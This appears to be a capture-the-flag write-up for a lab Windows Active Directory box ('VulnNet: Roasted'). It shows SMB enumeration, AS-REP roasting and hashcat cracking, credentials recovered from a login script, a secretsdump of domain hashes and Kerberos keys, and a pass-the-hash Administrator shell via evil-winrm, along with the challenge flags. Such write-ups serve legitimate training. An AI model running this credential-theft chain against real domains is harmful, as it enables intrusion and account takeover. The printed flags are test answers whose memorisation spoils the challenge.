PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-20 21:31:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49683/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
There is a lot of information here, here are some of the key takeaways:
Port 139/445 > Samba service active
Port 88 > Microsoft Windows Kerberos
Port 389/3268 > Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
Enumeration
SMB
Checking SMB first as the obvious choice, listing out the shares shows:
smbclient -L $TARGET -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing
The following shares are accessible and have content that can be pulled and read:
smbclient //$TARGET/VulnNet-Business-Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 12 18:46:40 2021
.. D 0 Fri Mar 12 18:46:40 2021
Business-Manager.txt A 758 Thu Mar 11 17:24:34 2021
Business-Sections.txt A 654 Thu Mar 11 17:24:34 2021
Business-Tracking.txt A 471 Thu Mar 11 17:24:34 2021
smbclient //$TARGET/VulnNet-Enterprise-Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 12 18:46:40 2021
.. D 0 Fri Mar 12 18:46:40 2021
Enterprise-Operations.txt A 467 Thu Mar 11 17:24:34 2021
Enterprise-Safety.txt A 503 Thu Mar 11 17:24:34 2021
Enterprise-Sync.txt A 496 Thu Mar 11 17:24:34 2021
Reading these files shows a plethora of useful information, primarily user information. The tool crackmapexec, which is used to collect active directory information, can be used to get further information on usernames with the following command:
Another tool that can be used to do the same thing is Impackets' lookupsid.py module:
lookupsid.py -no-pass anonymous@$TARGET
Kerberos
Since I have crafted a list of possible usernames and there is an open Kerberos service, I can attempt to conduct "Kerberoasting", an attack method for cracking hashes for service accounts in active directory. This will attempt to get tickets from the Domain Controller, and crack them using a tool like hashcat or johntheripper to get the actual passwords.
Using Impacket, an open source tool installed on Kali, I can use modules like GetUserSPNs or GetNPUsers to try to get some ticket responses, the first requiring a password and the latter not requiring one. The module GetNPUsers is for ASREPRoast, which is used to crack user passwords if a user has the DONT_REQ_PREAUTH attribute which allows the KDC to respond with KRB_AS_REP user hashes even without a password.
GetNPUsers.py -format hashcat -usersfile roasted_users.txt --outputfile hash-hashcat.txt --ou-dc-ip $TARGET vulnnet-rst/
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST:ac09439c236620b9bc13c6b0c570c4b3$0493b49742538cc119ea4aaa99dec306f5dbd250867dd4804b3c0f39e6e916e4fee31ae087e13e34237064797307de308c0ef51292f8031ba0a79ec803232a597b316b051725402f2fc84eb875d283504fa086fddc8a66642f5c5b4cdae192d2b2cae954b4ba77f01c5aac49b2386e3f46ec4be702f25453ca0517ddb4e2e4c14298b12d5e4428b5d9d4021672874b47bf2930a231eafd0c330ddcbca39a9867a61b7b475ca8d57c2004ae9da701a50292305a7d408a0dba1d99d1a77cbe9746645f868e7455d9230685113d3f17a4f5d82044656018090f1d1a8376115d67d19f6613ecc23b5150228811133e859a04
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
The user "t-skid" returned a TGT hash which can then be cracked in hashcat. Using the command hashcat -h | grep -i "kerberos" shows a number of options, the correct one is "18200 | Kerberos 5, etype 23, AS-REP"
sudo hashcat -m 18200 -a 0 hash-hashcat.txt $ROCKYOU
This gives the password for user t-skid: tj072889*
Username: t-skid
Password: tj072889*
Exploitation
After getting the initial credentials, I tried to enumerate other shares that were previously blocked. The share NETLOGON was accessible this time and contained a file called ResetPassword.vbs. The following commands worked to login and retrieve the file:
smbclient //$TARGET/NETLOGON -U t-skid
Password for [WORKGROUP\t-skid]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Mar 16 16:15:49 2021
.. D 0 Tue Mar 16 16:15:49 2021
ResetPassword.vbs A 2821 Tue Mar 16 16:18:14 2021
8771839 blocks of size 4096. 4534166 blocks available
smb: \> get ResetPassword.vbs
getting file \ResetPassword.vbs of size 2821 as ResetPassword.vbs (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
The retrieved file shows the following:
ResetPassword.vbs
Option Explicit
Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName
' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1
If (Wscript.Arguments.Count <> 0) Then
Wscript.Echo "Syntax Error. Correct syntax is:"
Wscript.Echo "cscript ResetPassword.vbs"
Wscript.Quit
End If
strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"
' Determine DNS domain name from RootDSE object.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDNSDomain = objRootDSE.Get("defaultNamingContext")
' Use the NameTranslate object to find the NetBIOS domain name from the
' DNS domain name.
Set objTrans = CreateObject("NameTranslate")
objTrans.Init ADS_NAME_INITTYPE_GC, ""
objTrans.Set ADS_NAME_TYPE_1779, strDNSDomain
strNetBIOSDomain = objTrans.Get(ADS_NAME_TYPE_NT4)
' Remove trailing backslash.
strNetBIOSDomain = Left(strNetBIOSDomain, Len(strNetBIOSDomain) - 1)
' Use the NameTranslate object to convert the NT user name to the
' Distinguished Name required for the LDAP provider.
On Error Resume Next
objTrans.Set ADS_NAME_TYPE_NT4, strNetBIOSDomain & "\" & strUserNTName
If (Err.Number <> 0) Then
On Error GoTo 0
Wscript.Echo "User " & strUserNTName _
& " not found in Active Directory"
Wscript.Echo "Program aborted"
Wscript.Quit
End If
strUserDN = objTrans.Get(ADS_NAME_TYPE_1779)
' Escape any forward slash characters, "/", with the backslash
' escape character. All other characters that should be escaped are.
strUserDN = Replace(strUserDN, "/", "\/")
' Bind to the user object in Active Directory with the LDAP provider.
On Error Resume Next
Set objUser = GetObject("LDAP://" & strUserDN)
If (Err.Number <> 0) Then
On Error GoTo 0
Wscript.Echo "User " & strUserNTName _
& " not found in Active Directory"
Wscript.Echo "Program aborted"
Wscript.Quit
End If
objUser.SetPassword strPassword
If (Err.Number <> 0) Then
On Error GoTo 0
Wscript.Echo "Password NOT reset for " &vbCrLf & strUserNTName
Wscript.Echo "Password " & strPassword & " may not be allowed, or"
Wscript.Echo "this client may not support a SSL connection."
Wscript.Echo "Program aborted"
Wscript.Quit
Else
objUser.AccountDisabled = False
objUser.Put "pwdLastSet", 0
Err.Clear
objUser.SetInfo
If (Err.Number <> 0) Then
On Error GoTo 0
Wscript.Echo "Password reset for " & strUserNTName
Wscript.Echo "But, unable to enable account or expire password"
Wscript.Quit
End If
End If
On Error GoTo 0
Wscript.Echo "Password reset, account enabled,"
Wscript.Echo "and password expired for user " & strUserNTName
In the beginning of the script are the credentials for user a-whitehat:
Username: a-whitehat
Password: bNdKVkjv3RR9ht
User a-whitehat actually has privileges to do a number of things including read and write to the ADMIN$ share. This can be shown through the following command:
Logging into the ADMIN$ share and navigating to the \Users\enterprise-core-vn\Desktop\ path shows the user flag user.txt.
user.txt: THM{726b7c0baaac1455d05c827b5561f4ed}
Privilege Escalation
Trying to print out the system flag from here straight out failed due to an "Access Denied" prompt. No worries, since user a-whitehat has write access to SMB an an administrator, it's possible to use the Impacket module secretsdump to get the SAM hashes. These hashes could potentially be used to get a shell on the box.
secretsdump.py vulnnet-rst/a-whitehat:bNdKVkjv3RR9ht@$TARGET
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] NL$KM
0000 F3 F6 6B 8D 1E 2A F4 8E 85 F6 7A 46 D1 25 A0 D3 ..k..*....zF.%..
0010 EA F4 90 7D 2D CB A5 8C 88 C5 68 4C 1E D3 67 3B ...}-.....hL..g;
0020 DB 31 D9 91 C9 BB 6A 57 EA 18 2C 90 D3 06 F8 31 .1....jW..,....1
0030 7C 8C 31 96 5E 53 5B 85 60 B4 D5 6B 47 61 85 4A |.1.^S[.`..kGa.J
NL$KM:f3f66b8d1e2af48e85f67a46d125a0d3eaf4907d2dcba58c88c5684c1ed3673bdb31d991c9bb6a57ea182c90d306f8317c8c31965e535b8560b4d56b4761854a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7633f01273fc92450b429d6067d1ca32:::
vulnnet-rst.local\enterprise-core-vn:1104:aad3b435b51404eeaad3b435b51404ee:8752ed9e26e6823754dce673de76ddaf:::
vulnnet-rst.local\a-whitehat:1105:aad3b435b51404eeaad3b435b51404ee:1bd408897141aa076d62e9bfc1a5956b:::
vulnnet-rst.local\t-skid:1109:aad3b435b51404eeaad3b435b51404ee:49840e8a32937578f8c55fdca55ac60b:::
vulnnet-rst.local\j-goldenhand:1110:aad3b435b51404eeaad3b435b51404ee:1b1565ec2b57b756b912b5dc36bc272a:::
vulnnet-rst.local\j-leet:1111:aad3b435b51404eeaad3b435b51404ee:605e5542d42ea181adeca1471027e022:::
WIN-2BO8M1OE1M1$:1000:aad3b435b51404eeaad3b435b51404ee:b29bcd4a0cbf3f4661e3441ecce96db5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:7f9adcf2cb65ebb5babde6ec63e0c8165a982195415d81376d1f4ae45072ab83
Administrator:aes128-cts-hmac-sha1-96:d9d0cc6b879ca5b7cfa7633ffc81b849
Administrator:des-cbc-md5:52d325cb2acd8fc1
krbtgt:aes256-cts-hmac-sha1-96:a27160e8a53b1b151fa34f45524a07eb9899ebdf0051b20d677f0c3b518885bd
krbtgt:aes128-cts-hmac-sha1-96:75c22aac8f2b729a3a5acacec729e353
krbtgt:des-cbc-md5:1357f2e9d3bc0bd3
vulnnet-rst.local\enterprise-core-vn:aes256-cts-hmac-sha1-96:9da9e2e1e8b5093fb17b9a4492653ceab4d57a451bd41de36b7f6e06e91e98f3
vulnnet-rst.local\enterprise-core-vn:aes128-cts-hmac-sha1-96:47ca3e5209bc0a75b5622d20c4c81d46
vulnnet-rst.local\enterprise-core-vn:des-cbc-md5:200e0102ce868016
vulnnet-rst.local\a-whitehat:aes256-cts-hmac-sha1-96:f0858a267acc0a7170e8ee9a57168a0e1439dc0faf6bc0858a57687a504e4e4c
vulnnet-rst.local\a-whitehat:aes128-cts-hmac-sha1-96:3fafd145cdf36acaf1c0e3ca1d1c5c8d
vulnnet-rst.local\a-whitehat:des-cbc-md5:028032c2a8043ddf
vulnnet-rst.local\t-skid:aes256-cts-hmac-sha1-96:a7d2006d21285baee8e46454649f3bd4a1790c7f4be7dd0ce72360dc6c962032
vulnnet-rst.local\t-skid:aes128-cts-hmac-sha1-96:8bdfe91cca8b16d1b3b3fb6c02565d16
vulnnet-rst.local\t-skid:des-cbc-md5:25c2739dcb646bfd
vulnnet-rst.local\j-goldenhand:aes256-cts-hmac-sha1-96:fc08aeb44404f23ff98ebc3aba97242155060928425ec583a7f128a218e4c5ad
vulnnet-rst.local\j-goldenhand:aes128-cts-hmac-sha1-96:7d218a77c73d2ea643779ac9b125230a
vulnnet-rst.local\j-goldenhand:des-cbc-md5:c4e65d49feb63180
vulnnet-rst.local\j-leet:aes256-cts-hmac-sha1-96:1327c55f2fa5e4855d990962d24986b63921bd8a10c02e862653a0ac44319c62
vulnnet-rst.local\j-leet:aes128-cts-hmac-sha1-96:f5d92fe6dc0f8e823f229fab824c1aa9
vulnnet-rst.local\j-leet:des-cbc-md5:0815580254a49854
WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:54c1fcdbe4b883e52e3008ca027bbc06fb69be39535b5f8f1112d6ab11937bf0
WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:e06812ec14e5b3d29f7823aa292dee0f
WIN-2BO8M1OE1M1$:des-cbc-md5:92da58ef759ee046
The NTHash of the Administrator is the fourth section under the "Dumping local SAM hashes". This can be used with the tool evil-winrm, a powerful shell creator utilizing Windows Remote Management, to gain an administrator shell
evil-winrm -i $TARGET -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vulnnet-rst\administrator
Navigating to C:\Users\Administrator\Desktop can find the system.txt flag!
